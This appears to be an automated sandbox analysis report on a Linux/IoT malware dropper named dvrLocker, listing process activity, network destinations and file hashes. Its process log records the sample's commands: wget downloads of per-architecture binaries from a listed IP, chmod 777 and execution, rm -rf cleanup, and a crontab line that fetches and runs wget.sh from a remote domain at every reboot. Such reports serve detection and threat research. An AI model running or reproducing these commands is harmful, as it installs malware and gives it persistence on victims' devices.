File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/866/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/854/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/881/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/899/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/927/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/825/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/838/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/908/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/917/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/913/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/819/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/836/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/869/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/883/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/896/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/904/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/105/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/113/exe]

/bin/ls

[ls -l /proc/114/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/143/exe]

/bin/ls

[ls -l /proc/147/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/236/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/327/exe]

/bin/ls

[ls -l /proc/329/exe]

/bin/ls

[ls -l /proc/331/exe]

/bin/ls

[ls -l /proc/335/exe]

/bin/ls

[ls -l /proc/340/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/379/exe]

/bin/ls

[ls -l /proc/380/exe]

/bin/ls

[ls -l /proc/384/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/425/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/670/exe]

/bin/ls

[ls -l /proc/673/exe]

/bin/ls

[ls -l /proc/677/exe]

/bin/ls

[ls -l /proc/678/exe]

/bin/ls

[ls -l /proc/684/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/700/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/703/exe]

/bin/ls

[ls -l /proc/704/exe]

/bin/ls

[ls -l /proc/706/exe]

/bin/ls

[ls -l /proc/707/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
DE 80.152.203.134:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:20155 kingstonwikkerink.dyn tcp
CN 43.226.79.41:62371 udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/var/spool/cron/crontabs/tmp.u40wTl

MD5 8cd195f9cc1ac87a6d7e9413b64538d9
SHA1 9e110eaec931ddff0d54fa3372efd7b8c089975c
SHA256 8cb497497f0f07ff2bca1cf7c4fcecad4c5f2a942fa86a8cdf9b1d621f96dd68
SHA512 2e70f0d3e836619adffa3dbf0da481f42e737cba59a83418e387a34fe7ce781eef50c1cdba4e166c1f87ae237817479b474e53702d7e9da746c22cbb4c690652